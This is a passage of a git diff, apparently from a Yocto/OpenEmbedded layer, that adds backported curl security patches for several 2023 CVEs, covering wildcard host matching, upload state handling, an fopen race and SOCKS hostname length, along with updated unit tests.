49+#ifdef USE_ALARM_TIMEOUT
50 /* Beware this is a global and unique instance. This is used to store the
51 return address that we can jump back to from inside a signal handler. This
52 is not thread-safe stuff. */
53 sigjmp_buf curl_jmpenv;
54+curl_simple_lock curl_jmpenv_lock;
55 #endif
56
57 /* lookup address, returns entry if found and not stale */
58@@ -614,7 +622,6 @@ enum resolve_t Curl_resolv(struct connectdata *conn,
59 static
60 RETSIGTYPE alarmfunc(int sig)
61 {
62- /* this is for "-ansi -Wall -pedantic" to stop complaining! (rabe) */
63 (void)sig;
64 siglongjmp(curl_jmpenv, 1);
65 }
66@@ -695,6 +702,8 @@ enum resolve_t Curl_resolv_timeout(struct connectdata *conn,
67 This should be the last thing we do before calling Curl_resolv(),
68 as otherwise we'd have to worry about variables that get modified
69 before we invoke Curl_resolv() (and thus use "volatile"). */
70+ curl_simple_lock_lock(&curl_jmpenv_lock);
71+
72 if(sigsetjmp(curl_jmpenv, 1)) {
73 /* this is coming from a siglongjmp() after an alarm signal */
74 failf(data, "name lookup timed out");
75@@ -763,6 +772,8 @@ clean_up:
76 #endif
77 #endif /* HAVE_SIGACTION */
78
79+ curl_simple_lock_unlock(&curl_jmpenv_lock);
80+
81 /* switch back the alarm() to either zero or to what it was before minus
82 the time we spent until now! */
83 if(prev_alarm) {
84--
852.25.1
86
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28321.patch b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
new file mode 100644
index 0000000000..da1d1fdcd6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
@@ -0,0 +1,272 @@
1Upstream-Status: Backport [import from ubuntu curl_7.68.0-1ubuntu2.20 with
2minor change to tests/data/test1397 part so the patch can be apply.
3upstream: https://github.com/curl/curl/commit/199f2d440d8659b42 ]
4CVE: CVE-2023-28321
5Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
6
7This backport was obtained from SUSE.
8
9From 199f2d440d8659b42670c1b796220792b01a97bf Mon Sep 17 00:00:00 2001
10From: Daniel Stenberg <daniel@haxx.se>
11Date: Mon, 24 Apr 2023 21:07:02 +0200
12Subject: [PATCH] hostcheck: fix host name wildcard checking
13
14The leftmost "label" of the host name can now only match against single
15'*'. Like the browsers have worked for a long time.
16
17- extended unit test 1397 for this
18- move some SOURCE variables from unit/Makefile.am to unit/Makefile.inc
19
20Reported-by: Hiroki Kurosawa
21Closes #11018
22---
23 lib/hostcheck.c | 50 +++++++--------
24 tests/data/test1397 | 10 ++-
25 tests/unit/Makefile.am | 94 ----------------------------
26 tests/unit/Makefile.inc | 94 ++++++++++++++++++++++++++++
27 tests/unit/unit1397.c | 134 ++++++++++++++++++++++++----------------
28 5 files changed, 202 insertions(+), 180 deletions(-)
29
30--- a/lib/hostcheck.c
31+++ b/lib/hostcheck.c
32@@ -58,15 +58,19 @@
33 * apparent distinction between a name and an IP. We need to detect the use of
34 * an IP address and not wildcard match on such names.
35 *
36+ * Only match on "*" being used for the leftmost label, not "a*", "a*b" nor
37+ * "*b".
38+ *
39+ * @unittest: 1397
40+ *
41 * NOTE: hostmatch() gets called with copied buffers so that it can modify the
42 * contents at will.
43 */
44
45 static int hostmatch(char *hostname, char *pattern)
46 {
47- const char *pattern_label_end, *pattern_wildcard, *hostname_label_end;
48- int wildcard_enabled;
49- size_t prefixlen, suffixlen;
50+ const char *pattern_label_end, *hostname_label_end;
51+ size_t suffixlen;
52 struct in_addr ignored;
53 #ifdef ENABLE_IPV6
54 struct sockaddr_in6 si6;
55@@ -80,13 +84,12 @@ static int hostmatch(char *hostname, cha
56 if(pattern[len-1]=='.')
57 pattern[len-1] = 0;
58
59- pattern_wildcard = strchr(pattern, '*');
60- if(pattern_wildcard == NULL)
61+ if(strncmp(pattern, "*.", 2))
62 return strcasecompare(pattern, hostname) ?
63 CURL_HOST_MATCH : CURL_HOST_NOMATCH;
64
65 /* detect IP address as hostname and fail the match if so */
66- if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
67+ else if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
68 return CURL_HOST_NOMATCH;
69 #ifdef ENABLE_IPV6
70 if(Curl_inet_pton(AF_INET6, hostname, &si6.sin6_addr) > 0)
71@@ -95,14 +98,9 @@ static int hostmatch(char *hostname, cha
72
73 /* We require at least 2 dots in pattern to avoid too wide wildcard
74 match. */
75- wildcard_enabled = 1;
76 pattern_label_end = strchr(pattern, '.');
77- if(pattern_label_end == NULL || strchr(pattern_label_end + 1, '.') == NULL ||
78- pattern_wildcard > pattern_label_end ||
79- strncasecompare(pattern, "xn--", 4)) {
80- wildcard_enabled = 0;
81- }
82- if(!wildcard_enabled)
83+ if(pattern_label_end == NULL ||
84+ strchr(pattern_label_end + 1, '.') == NULL)
85 return strcasecompare(pattern, hostname) ?
86 CURL_HOST_MATCH : CURL_HOST_NOMATCH;
87
88@@ -117,11 +115,9 @@ static int hostmatch(char *hostname, cha
89 if(hostname_label_end - hostname < pattern_label_end - pattern)
90 return CURL_HOST_NOMATCH;
91
92- prefixlen = pattern_wildcard - pattern;
93- suffixlen = pattern_label_end - (pattern_wildcard + 1);
94- return strncasecompare(pattern, hostname, prefixlen) &&
95- strncasecompare(pattern_wildcard + 1, hostname_label_end - suffixlen,
96- suffixlen) ?
97+ suffixlen = pattern_label_end - (pattern + 1);
98+ return strncasecompare(pattern + 1, hostname_label_end - suffixlen,
99+ suffixlen) ?
100 CURL_HOST_MATCH : CURL_HOST_NOMATCH;
101 }
102
103--- a/tests/data/test1397
104+++ b/tests/data/test1397
105@@ -2,8 +2,7 @@
106 <info>
107 <keywords>
108 unittest
109-ssl
110-wildcard
111+Curl_cert_hostcheck
112 </keywords>
113 </info>
114
115@@ -16,9 +15,8 @@ none
116 <features>
117 unittest
118 </features>
119- <name>
120-Check wildcard certificate matching function Curl_cert_hostcheck
121- </name>
122+<name>
123+Curl_cert_hostcheck unit tests
124+</name>
125 </client>
126-
127 </testcase>
128--- a/tests/unit/unit1397.c
129+++ b/tests/unit/unit1397.c
130@@ -21,8 +21,6 @@
131 ***************************************************************************/
132 #include "curlcheck.h"
133
134-#include "hostcheck.h" /* from the lib dir */
135-
136 static CURLcode unit_setup(void)
137 {
138 return CURLE_OK;
139@@ -30,50 +28,94 @@ static CURLcode unit_setup(void)
140
141 static void unit_stop(void)
142 {
143- /* done before shutting down and exiting */
144 }
145
146-UNITTEST_START
147+* only these backends define the tested functions */
148+#if defined(USE_OPENSSL) || defined(USE_GSKIT) || \
149+ defined(USE_SCHANNEL)
150+#include "hostcheck.h"
151+struct testcase {
152+ const char *host;
153+ const char *pattern;
154+ bool match;
155+};
156+
157+static struct testcase tests[] = {
158+ {"", "", FALSE},
159+ {"a", "", FALSE},
160+ {"", "b", FALSE},
161+ {"a", "b", FALSE},
162+ {"aa", "bb", FALSE},
163+ {"\xff", "\xff", TRUE},
164+ {"aa.aa.aa", "aa.aa.bb", FALSE},
165+ {"aa.aa.aa", "aa.aa.aa", TRUE},
166+ {"aa.aa.aa", "*.aa.bb", FALSE},
167+ {"aa.aa.aa", "*.aa.aa", TRUE},
168+ {"192.168.0.1", "192.168.0.1", TRUE},
169+ {"192.168.0.1", "*.168.0.1", FALSE},
170+ {"192.168.0.1", "*.0.1", FALSE},
171+ {"h.ello", "*.ello", FALSE},
172+ {"h.ello.", "*.ello", FALSE},
173+ {"h.ello", "*.ello.", FALSE},
174+ {"h.e.llo", "*.e.llo", TRUE},
175+ {"h.e.llo", " *.e.llo", FALSE},
176+ {" h.e.llo", "*.e.llo", TRUE},
177+ {"h.e.llo.", "*.e.llo", TRUE},
178+ {"*.e.llo.", "*.e.llo", TRUE},
179+ {"************.e.llo.", "*.e.llo", TRUE},
180+ {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
181+ "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
182+ "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
183+ "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
184+ "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
185+ ".e.llo.", "*.e.llo", TRUE},
186+ {"\xfe\xfe.e.llo.", "*.e.llo", TRUE},
187+ {"h.e.llo.", "*.e.llo.", TRUE},
188+ {"h.e.llo", "*.e.llo.", TRUE},
189+ {".h.e.llo", "*.e.llo.", FALSE},
190+ {"h.e.llo", "*.*.llo.", FALSE},
191+ {"h.e.llo", "h.*.llo", FALSE},
192+ {"h.e.llo", "h.e.*", FALSE},
193+ {"hello", "*.ello", FALSE},
194+ {"hello", "**llo", FALSE},
195+ {"bar.foo.example.com", "*.example.com", FALSE},
196+ {"foo.example.com", "*.example.com", TRUE},
197+ {"baz.example.net", "b*z.example.net", FALSE},
198+ {"foobaz.example.net", "*baz.example.net", FALSE},
199+ {"xn--l8j.example.local", "x*.example.local", FALSE},
200+ {"xn--l8j.example.net", "*.example.net", TRUE},
201+ {"xn--l8j.example.net", "*j.example.net", FALSE},
202+ {"xn--l8j.example.net", "xn--l8j.example.net", TRUE},
203+ {"xn--l8j.example.net", "xn--l8j.*.net", FALSE},
204+ {"xl8j.example.net", "*.example.net", TRUE},
205+ {"fe80::3285:a9ff:fe46:b619", "*::3285:a9ff:fe46:b619", FALSE},
206+ {"fe80::3285:a9ff:fe46:b619", "fe80::3285:a9ff:fe46:b619", TRUE},
207+ {NULL, NULL, FALSE}
208+};
209
210-/* only these backends define the tested functions */
211-#if defined(USE_OPENSSL) || defined(USE_GSKIT)
212+UNITTEST_START
213+{
214+ int i;
215+ for(i = 0; tests[i].host; i++) {
216+ if(tests[i].match != Curl_cert_hostcheck(tests[i].pattern,
217+ tests[i].host)) {
218+ fprintf(stderr,
219+ "HOST: %s\n"
220+ "PTRN: %s\n"
221+ "did %sMATCH\n",
222+ tests[i].host,
223+ tests[i].pattern,
224+ tests[i].match ? "NOT ": "");
225+ unitfail++;
226+ }
227+ }
228+}
229
230- /* here you start doing things and checking that the results are good */
231+UNITTEST_STOP
232+#else
233
234-fail_unless(Curl_cert_hostcheck("www.example.com", "www.example.com"),
235- "good 1");
236-fail_unless(Curl_cert_hostcheck("*.example.com", "www.example.com"),
237- "good 2");
238-fail_unless(Curl_cert_hostcheck("xxx*.example.com", "xxxwww.example.com"),
239- "good 3");
240-fail_unless(Curl_cert_hostcheck("f*.example.com", "foo.example.com"),
241- "good 4");
242-fail_unless(Curl_cert_hostcheck("192.168.0.0", "192.168.0.0"),
243- "good 5");
244-
245-fail_if(Curl_cert_hostcheck("xxx.example.com", "www.example.com"), "bad 1");
246-fail_if(Curl_cert_hostcheck("*", "www.example.com"), "bad 2");
247-fail_if(Curl_cert_hostcheck("*.*.com", "www.example.com"), "bad 3");
248-fail_if(Curl_cert_hostcheck("*.example.com", "baa.foo.example.com"), "bad 4");
249-fail_if(Curl_cert_hostcheck("f*.example.com", "baa.example.com"), "bad 5");
250-fail_if(Curl_cert_hostcheck("*.com", "example.com"), "bad 6");
251-fail_if(Curl_cert_hostcheck("*fail.com", "example.com"), "bad 7");
252-fail_if(Curl_cert_hostcheck("*.example.", "www.example."), "bad 8");
253-fail_if(Curl_cert_hostcheck("*.example.", "www.example"), "bad 9");
254-fail_if(Curl_cert_hostcheck("", "www"), "bad 10");
255-fail_if(Curl_cert_hostcheck("*", "www"), "bad 11");
256-fail_if(Curl_cert_hostcheck("*.168.0.0", "192.168.0.0"), "bad 12");
257-fail_if(Curl_cert_hostcheck("www.example.com", "192.168.0.0"), "bad 13");
258-
259-#ifdef ENABLE_IPV6
260-fail_if(Curl_cert_hostcheck("*::3285:a9ff:fe46:b619",
261- "fe80::3285:a9ff:fe46:b619"), "bad 14");
262-fail_unless(Curl_cert_hostcheck("fe80::3285:a9ff:fe46:b619",
263- "fe80::3285:a9ff:fe46:b619"), "good 6");
264-#endif
265+UNITTEST_START
266
267+UNITTEST_STOP
268 #endif
269
270- /* you end the test code like this: */
271-
272-UNITTEST_STOP
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28322.patch b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
new file mode 100644
index 0000000000..9351a2c286
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
@@ -0,0 +1,380 @@
1CVE: CVE-2023-28322
2Upstream-Status: Backport [ import patch from ubuntu curl_7.68.0-1ubuntu2.20
3upstream https://github.com/curl/curl/commit/7815647d6582c0a4900be2e1de ]
4Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
5
6Backport of:
7
8From 7815647d6582c0a4900be2e1de6c5e61272c496b Mon Sep 17 00:00:00 2001
9From: Daniel Stenberg <daniel@haxx.se>
10Date: Tue, 25 Apr 2023 08:28:01 +0200
11Subject: [PATCH] lib: unify the upload/method handling
12
13By making sure we set state.upload based on the set.method value and not
14independently as set.upload, we reduce confusion and mixup risks, both
15internally and externally.
16
17Closes #11017
18---
19 lib/curl_rtmp.c | 4 ++--
20 lib/file.c | 4 ++--
21 lib/ftp.c | 8 ++++----
22 lib/http.c | 4 ++--
23 lib/imap.c | 6 +++---
24 lib/rtsp.c | 4 ++--
25 lib/setopt.c | 6 ++----
26 lib/smb.c | 6 +++---
27 lib/smtp.c | 4 ++--
28 lib/tftp.c | 8 ++++----
29 lib/transfer.c | 4 ++--
30 lib/urldata.h | 2 +-
31 lib/vssh/libssh.c | 6 +++---
32 lib/vssh/libssh2.c | 6 +++---
33 lib/vssh/wolfssh.c | 2 +-
34 15 files changed, 36 insertions(+), 38 deletions(-)
35
36--- a/lib/curl_rtmp.c
37+++ b/lib/curl_rtmp.c
38@@ -213,7 +213,7 @@ static CURLcode rtmp_connect(struct conn
39 /* We have to know if it's a write before we send the
40 * connect request packet
41 */
42- if(conn->data->set.upload)
43+ if(conn->data->state.upload)
44 r->Link.protocol |= RTMP_FEATURE_WRITE;
45
46 /* For plain streams, use the buffer toggle trick to keep data flowing */
47@@ -245,7 +245,7 @@ static CURLcode rtmp_do(struct connectda
48 if(!RTMP_ConnectStream(r, 0))
49 return CURLE_FAILED_INIT;
50
51- if(conn->data->set.upload) {
52+ if(conn->data->state.upload) {
53 Curl_pgrsSetUploadSize(data, data->state.infilesize);
54 Curl_setup_transfer(data, -1, -1, FALSE, FIRSTSOCKET);
55 }
56--- a/lib/file.c
57+++ b/lib/file.c
58@@ -198,7 +198,7 @@ static CURLcode file_connect(struct conn
59 file->freepath = real_path; /* free this when done */
60
61 file->fd = fd;
62- if(!data->set.upload && (fd == -1)) {
63+ if(!data->state.upload && (fd == -1)) {
64 failf(data, "Couldn't open file %s", data->state.up.path);
65 file_done(conn, CURLE_FILE_COULDNT_READ_FILE, FALSE);
66 return CURLE_FILE_COULDNT_READ_FILE;
67@@ -390,7 +390,7 @@ static CURLcode file_do(struct connectda
68
69 Curl_pgrsStartNow(data);
70
71- if(data->set.upload)
72+ if(data->state.upload)
73 return file_upload(conn);
74
75 file = conn->data->req.protop;
76--- a/lib/ftp.c
77+++ b/lib/ftp.c
78@@ -1371,7 +1371,7 @@ static CURLcode ftp_state_prepare_transf
79 data->set.str[STRING_CUSTOMREQUEST]:
80 (data->set.ftp_list_only?"NLST":"LIST"));
81 }
82- else if(data->set.upload) {
83+ else if(data->state.upload) {
84 PPSENDF(&conn->proto.ftpc.pp, "PRET STOR %s", conn->proto.ftpc.file);
85 }
86 else {
87@@ -3303,7 +3303,7 @@ static CURLcode ftp_done(struct connectd
88 /* the response code from the transfer showed an error already so no
89 use checking further */
90 ;
91- else if(data->set.upload) {
92+ else if(data->state.upload) {
93 if((-1 != data->state.infilesize) &&
94 (data->state.infilesize != data->req.writebytecount) &&
95 !data->set.crlf &&
96@@ -3570,7 +3570,7 @@ static CURLcode ftp_do_more(struct conne
97 connected back to us */
98 }
99 }
100- else if(data->set.upload) {
101+ else if(data->state.upload) {
102 result = ftp_nb_type(conn, data->set.prefer_ascii, FTP_STOR_TYPE);
103 if(result)
104 return result;
105@@ -4209,7 +4209,7 @@ CURLcode ftp_parse_url_path(struct conne
106 ftpc->file = NULL; /* instead of point to a zero byte,
107 we make it a NULL pointer */
108
109- if(data->set.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
110+ if(data->state.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
111 /* We need a file name when uploading. Return error! */
112 failf(data, "Uploading to a URL without a file name!");
113 free(rawPath);
114--- a/lib/http.c
115+++ b/lib/http.c
116@@ -2080,7 +2080,7 @@ CURLcode Curl_http(struct connectdata *c
117 }
118
119 if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
120- data->set.upload) {
121+ data->state.upload) {
122 httpreq = HTTPREQ_PUT;
123 }
124
125@@ -2261,7 +2261,7 @@ CURLcode Curl_http(struct connectdata *c
126 if((conn->handler->protocol & PROTO_FAMILY_HTTP) &&
127 (((httpreq == HTTPREQ_POST_MIME || httpreq == HTTPREQ_POST_FORM) &&
128 http->postsize < 0) ||
129- ((data->set.upload || httpreq == HTTPREQ_POST) &&
130+ ((data->state.upload || httpreq == HTTPREQ_POST) &&
131 data->state.infilesize == -1))) {
132 if(conn->bits.authneg)
133 /* don't enable chunked during auth neg */
134--- a/lib/imap.c
135+++ b/lib/imap.c
136@@ -1469,11 +1469,11 @@ static CURLcode imap_done(struct connect
137 result = status; /* use the already set error code */
138 }
139 else if(!data->set.connect_only && !imap->custom &&
140- (imap->uid || imap->mindex || data->set.upload ||
141+ (imap->uid || imap->mindex || data->state.upload ||
142 data->set.mimepost.kind != MIMEKIND_NONE)) {
143 /* Handle responses after FETCH or APPEND transfer has finished */
144
145- if(!data->set.upload && data->set.mimepost.kind == MIMEKIND_NONE)
146+ if(!data->state.upload && data->set.mimepost.kind == MIMEKIND_NONE)
147 state(conn, IMAP_FETCH_FINAL);
148 else {
149 /* End the APPEND command first by sending an empty line */
150@@ -1539,7 +1539,7 @@ static CURLcode imap_perform(struct conn
151 selected = TRUE;
152
153 /* Start the first command in the DO phase */
154- if(conn->data->set.upload || data->set.mimepost.kind != MIMEKIND_NONE)
155+ if(conn->data->state.upload || data->set.mimepost.kind != MIMEKIND_NONE)
156 /* APPEND can be executed directly */
157 result = imap_perform_append(conn);
158 else if(imap->custom && (selected || !imap->mailbox))
159--- a/lib/rtsp.c
160+++ b/lib/rtsp.c
161@@ -499,7 +499,7 @@ static CURLcode rtsp_do(struct connectda
162 rtspreq == RTSPREQ_SET_PARAMETER ||
163 rtspreq == RTSPREQ_GET_PARAMETER) {
164
165- if(data->set.upload) {
166+ if(data->state.upload) {
167 putsize = data->state.infilesize;
168 data->set.httpreq = HTTPREQ_PUT;
169
170@@ -518,7 +518,7 @@ static CURLcode rtsp_do(struct connectda
171 result =
172 Curl_add_bufferf(&req_buffer,
173 "Content-Length: %" CURL_FORMAT_CURL_OFF_T"\r\n",
174- (data->set.upload ? putsize : postsize));
175+ (data->state.upload ? putsize : postsize));
176 if(result)
177 return result;
178 }
179--- a/lib/setopt.c
180+++ b/lib/setopt.c
181@@ -258,8 +258,8 @@ CURLcode Curl_vsetopt(struct Curl_easy *
182 * We want to sent data to the remote host. If this is HTTP, that equals
183 * using the PUT request.
184 */
185- data->set.upload = (0 != va_arg(param, long)) ? TRUE : FALSE;
186- if(data->set.upload) {
187+ arg = va_arg(param, long);
188+ if(arg) {
189 /* If this is HTTP, PUT is what's needed to "upload" */
190 data->set.httpreq = HTTPREQ_PUT;
191 data->set.opt_no_body = FALSE; /* this is implied */
192@@ -486,7 +486,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
193 }
194 else
195 data->set.httpreq = HTTPREQ_GET;
196- data->set.upload = FALSE;
197 break;
198
199 case CURLOPT_COPYPOSTFIELDS:
200@@ -797,7 +796,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
201 */
202 if(va_arg(param, long)) {
203 data->set.httpreq = HTTPREQ_GET;
204- data->set.upload = FALSE; /* switch off upload */
205 data->set.opt_no_body = FALSE; /* this is implied */
206 }
207 break;
208--- a/lib/smb.c
209+++ b/lib/smb.c
210@@ -516,7 +516,7 @@ static CURLcode smb_send_open(struct con
211 byte_count = strlen(req->path);
212 msg.name_length = smb_swap16((unsigned short)byte_count);
213 msg.share_access = smb_swap32(SMB_FILE_SHARE_ALL);
214- if(conn->data->set.upload) {
215+ if(conn->data->state.upload) {
216 msg.access = smb_swap32(SMB_GENERIC_READ | SMB_GENERIC_WRITE);
217 msg.create_disposition = smb_swap32(SMB_FILE_OVERWRITE_IF);
218 }
219@@ -792,7 +792,7 @@ static CURLcode smb_request_state(struct
220 smb_m = (const struct smb_nt_create_response*) msg;
221 req->fid = smb_swap16(smb_m->fid);
222 conn->data->req.offset = 0;
223- if(conn->data->set.upload) {
224+ if(conn->data->state.upload) {
225 conn->data->req.size = conn->data->state.infilesize;
226 Curl_pgrsSetUploadSize(conn->data, conn->data->req.size);
227 next_state = SMB_UPLOAD;
228--- a/lib/smtp.c
229+++ b/lib/smtp.c
230@@ -1210,7 +1210,7 @@ static CURLcode smtp_done(struct connect
231 result = status; /* use the already set error code */
232 }
233 else if(!data->set.connect_only && data->set.mail_rcpt &&
234- (data->set.upload || data->set.mimepost.kind)) {
235+ (data->state.upload || data->set.mimepost.kind)) {
236 /* Calculate the EOB taking into account any terminating CRLF from the
237 previous line of the email or the CRLF of the DATA command when there
238 is "no mail data". RFC-5321, sect. 4.1.1.4.
239@@ -1297,7 +1297,7 @@ static CURLcode smtp_perform(struct conn
240 smtp->eob = 2;
241
242 /* Start the first command in the DO phase */
243- if((data->set.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
244+ if((data->state.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
245 /* MAIL transfer */
246 result = smtp_perform_mail(conn);
247 else
248--- a/lib/tftp.c
249+++ b/lib/tftp.c
250@@ -390,7 +390,7 @@ static CURLcode tftp_parse_option_ack(tf
251
252 /* tsize should be ignored on upload: Who cares about the size of the
253 remote file? */
254- if(!data->set.upload) {
255+ if(!data->state.upload) {
256 if(!tsize) {
257 failf(data, "invalid tsize -:%s:- value in OACK packet", value);
258 return CURLE_TFTP_ILLEGAL;
259@@ -470,7 +470,7 @@ static CURLcode tftp_send_first(tftp_sta
260 return result;
261 }
262
263- if(data->set.upload) {
264+ if(data->state.upload) {
265 /* If we are uploading, send an WRQ */
266 setpacketevent(&state->spacket, TFTP_EVENT_WRQ);
267 state->conn->data->req.upload_fromhere =
268@@ -505,7 +505,7 @@ static CURLcode tftp_send_first(tftp_sta
269 if(!data->set.tftp_no_options) {
270 char buf[64];
271 /* add tsize option */
272- if(data->set.upload && (data->state.infilesize != -1))
273+ if(data->state.upload && (data->state.infilesize != -1))
274 msnprintf(buf, sizeof(buf), "%" CURL_FORMAT_CURL_OFF_T,
275 data->state.infilesize);
276 else
277@@ -559,7 +559,7 @@ static CURLcode tftp_send_first(tftp_sta
278 break;
279
280 case TFTP_EVENT_OACK:
281- if(data->set.upload) {
282+ if(data->state.upload) {
283 result = tftp_connect_for_tx(state, event);
284 }
285 else {
286--- a/lib/transfer.c
287+++ b/lib/transfer.c
288@@ -1405,6 +1405,7 @@ void Curl_init_CONNECT(struct Curl_easy
289 {
290 data->state.fread_func = data->set.fread_func_set;
291 data->state.in = data->set.in_set;
292+ data->state.upload = (data->set.httpreq == HTTPREQ_PUT);
293 }
294
295 /*
296@@ -1816,7 +1817,7 @@ CURLcode Curl_retry_request(struct conne
297
298 /* if we're talking upload, we can't do the checks below, unless the protocol
299 is HTTP as when uploading over HTTP we will still get a response */
300- if(data->set.upload &&
301+ if(data->state.upload &&
302 !(conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_RTSP)))
303 return CURLE_OK;
304
305--- a/lib/urldata.h
306+++ b/lib/urldata.h
307@@ -1427,6 +1427,7 @@ struct UrlState {
308 BIT(stream_depends_e); /* set or don't set the Exclusive bit */
309 BIT(previouslypending); /* this transfer WAS in the multi->pending queue */
310 BIT(cookie_engine);
311+ BIT(upload); /* upload request */
312 };
313
314
315@@ -1762,7 +1763,6 @@ struct UserDefined {
316 BIT(http_auto_referer); /* set "correct" referer when following
317 location: */
318 BIT(opt_no_body); /* as set with CURLOPT_NOBODY */
319- BIT(upload); /* upload request */
320 BIT(verbose); /* output verbosity */
321 BIT(krb); /* Kerberos connection requested */
322 BIT(reuse_forbid); /* forbidden to be reused, close after use */
323--- a/lib/vssh/libssh.c
324+++ b/lib/vssh/libssh.c
325@@ -1076,7 +1076,7 @@ static CURLcode myssh_statemach_act(stru
326 }
327
328 case SSH_SFTP_TRANS_INIT:
329- if(data->set.upload)
330+ if(data->state.upload)
331 state(conn, SSH_SFTP_UPLOAD_INIT);
332 else {
333 if(protop->path[strlen(protop->path)-1] == '/')
334@@ -1686,7 +1686,7 @@ static CURLcode myssh_statemach_act(stru
335 /* Functions from the SCP subsystem cannot handle/return SSH_AGAIN */
336 ssh_set_blocking(sshc->ssh_session, 1);
337
338- if(data->set.upload) {
339+ if(data->state.upload) {
340 if(data->state.infilesize < 0) {
341 failf(data, "SCP requires a known file size for upload");
342 sshc->actualcode = CURLE_UPLOAD_FAILED;
343@@ -1787,7 +1787,7 @@ static CURLcode myssh_statemach_act(stru
344 break;
345 }
346 case SSH_SCP_DONE:
347- if(data->set.upload)
348+ if(data->state.upload)
349 state(conn, SSH_SCP_SEND_EOF);
350 else
351 state(conn, SSH_SCP_CHANNEL_FREE);
352--- a/lib/vssh/libssh2.c
353+++ b/lib/vssh/libssh2.c
354@@ -1664,7 +1664,7 @@ static CURLcode ssh_statemach_act(struct
355 }
356
357 case SSH_SFTP_TRANS_INIT:
358- if(data->set.upload)
359+ if(data->state.upload)
360 state(conn, SSH_SFTP_UPLOAD_INIT);
361 else {
362 if(sftp_scp->path[strlen(sftp_scp->path)-1] == '/')
363@@ -2366,7 +2366,7 @@ static CURLcode ssh_statemach_act(struct
364 break;
365 }
366
367- if(data->set.upload) {
368+ if(data->state.upload) {
369 if(data->state.infilesize < 0) {
370 failf(data, "SCP requires a known file size for upload");
371 sshc->actualcode = CURLE_UPLOAD_FAILED;
372@@ -2504,7 +2504,7 @@ static CURLcode ssh_statemach_act(struct
373 break;
374
375 case SSH_SCP_DONE:
376- if(data->set.upload)
377+ if(data->state.upload)
378 state(conn, SSH_SCP_SEND_EOF);
379 else
380 state(conn, SSH_SCP_CHANNEL_FREE);
diff --git a/meta/recipes-support/curl/curl/CVE-2023-32001.patch b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
new file mode 100644
index 0000000000..f533992bcd
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
@@ -0,0 +1,38 @@
1From 0c667188e0c6cda615a036b8a2b4125f2c404dde Mon Sep 17 00:00:00 2001
2From: SaltyMilk <soufiane.elmelcaoui@gmail.com>
3Date: Mon, 10 Jul 2023 21:43:28 +0200
4Subject: [PATCH] fopen: optimize
5
6Closes #11419
7
8Upstream-Status: Backport [https://github.com/curl/curl/commit/0c667188e0c6cda615a036b8a2b4125f2c404dde]
9CVE: CVE-2023-32001
10Signed-off-by: Ashish Sharma <asharma@mvista.com>
11
12 lib/fopen.c | 12 ++++++------
13 1 file changed, 6 insertions(+), 6 deletions(-)
14
15diff --git a/lib/fopen.c b/lib/fopen.c
16index c9c9e3d6e73a2..b6e3cadddef65 100644
17--- a/lib/fopen.c
18+++ b/lib/fopen.c
19@@ -56,13 +56,13 @@ CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
20 int fd = -1;
21 *tempname = NULL;
22
23- if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
24- /* a non-regular file, fallback to direct fopen() */
25- *fh = fopen(filename, FOPEN_WRITETEXT);
26- if(*fh)
27- return CURLE_OK;
28+ *fh = fopen(filename, FOPEN_WRITETEXT);
29+ if(!*fh)
30 goto fail;
31- }
32+ if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
33+ return CURLE_OK;
34+ fclose(*fh);
35+ *fh = NULL;
36
37 result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
38 if(result)
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38545.patch b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
new file mode 100644
index 0000000000..c6b6726886
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
@@ -0,0 +1,148 @@
1From 600a1caeb2312fdee5ef1caf7d613c12a8b2424a Mon Sep 17 00:00:00 2001
2From: Mike Crowe <mac@mcrowe.com>
3Date: Wed, 11 Oct 2023 20:50:28 +0100
4Subject: [PATCH] socks: return error if hostname too long for remote resolve
5To: libcurl development <curl-library@cool.haxx.se>
6
7Prior to this change the state machine attempted to change the remote
8resolve to a local resolve if the hostname was longer than 255
9characters. Unfortunately that did not work as intended and caused a
10security issue.
11
12Name resolvers cannot resolve hostnames longer than 255 characters.
13
14Bug: https://curl.se/docs/CVE-2023-38545.html
15
16Unfortunately CURLE_PROXY and CURLPX_LONG_HOSTNAME were introduced in
177.73.0 so they can't be used in 7.69.1. Let's use
18CURLE_COULDNT_RESOLVE_HOST as the best available alternative and update
19the test appropriately.
20
21libcurl's test support has been improved considerably since 7.69.1 which
22means that the test must be modified to remove use of %VERSION and
23%TESTNUMBER and the stderr output can no longer be checked.
24
25CVE: CVE-2023-38545
